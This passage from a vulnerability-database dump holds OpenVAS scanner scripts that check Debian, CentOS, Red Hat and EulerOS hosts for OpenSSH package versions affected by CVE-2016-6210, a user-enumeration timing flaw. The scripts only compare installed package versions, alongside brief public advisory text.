"2017-07-24T12:55:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.", "modified": "2017-07-07T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:703626", "href": "http://plugins.openvas.org/nasl.php?oid=703626", "type": "openvas", "title": "Debian Security Advisory DSA 3626-1 (openssh - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3626.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3626-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703626);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6210\");\n script_name(\"Debian Security Advisory DSA 3626-1 (openssh - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:55:52 +0530 (Tue, 02 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3626.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssh on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\");\n script_tag(name: \"summary\", value: \"Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Check the version of openssh", "modified": "2019-03-08T00:00:00", "published": "2017-09-01T00:00:00", "id": "OPENVAS:1361412562310882763", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882763", "type": "openvas", "title": "CentOS Update for openssh CESA-2017:2563 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2563_openssh_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for openssh CESA-2017:2563 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882763\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 06:53:41 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for openssh CESA-2017:2563 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of openssh\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\nsupported by a number of Linux, UNIX, and similar operating systems. It includes\nthe core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n * A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated attacker\ncould possibly use this flaw to determine valid user names by measuring the\ntiming of server responses. (CVE-2016-6210)\");\n script_tag(name:\"affected\", value:\"openssh on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2563\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-August/022529.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-ldap\", rpm:\"openssh-ldap~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pam_ssh_agent_auth\", rpm:\"pam_ssh_agent_auth~0.9.3~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-09-01T00:00:00", "id": "OPENVAS:1361412562310811729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811729", "type": "openvas", "title": "RedHat Update for openssh RHSA-2017:2563-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2563-01_openssh.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for openssh RHSA-2017:2563-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811729\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 06:52:40 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2017:2563-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\nsupported by a number of Linux, UNIX, and similar operating systems. It includes\nthe core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n * A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated attacker\ncould possibly use this flaw to determine valid user names by measuring the\ntiming of server responses. (CVE-2016-6210)\");\n script_tag(name:\"affected\", value:\"openssh on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2563-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00086.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171189", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1189)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1189\");\n script_version(\"2020-01-23T10:57:17+0000\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:57:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:57:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1189)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1189\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1189\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1189 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:38:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171190", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1190)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1190\");\n script_version(\"2020-01-23T10:57:18+0000\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:57:18 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:57:18 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1190)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1190\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1190\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1190 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.", "modified": "2019-03-18T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310703626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703626", "type": "openvas", "title": "Debian Security Advisory DSA 3626-1 (openssh - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3626.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3626-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703626\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-6210\");\n script_name(\"Debian Security Advisory DSA 3626-1 (openssh - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:55:52 +0530 (Tue, 02 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3626.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\");\n script_tag(name:\"summary\", value:\"Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "This host is installed with openssh and\n is prone to denial of service and user enumeration vulnerabilities.", "modified": "2019-05-21T00:00:00", "published": "2016-08-18T00:00:00", "id": "OPENVAS:1361412562310809121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809121", "type": "openvas", "title": "OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809121\");\n 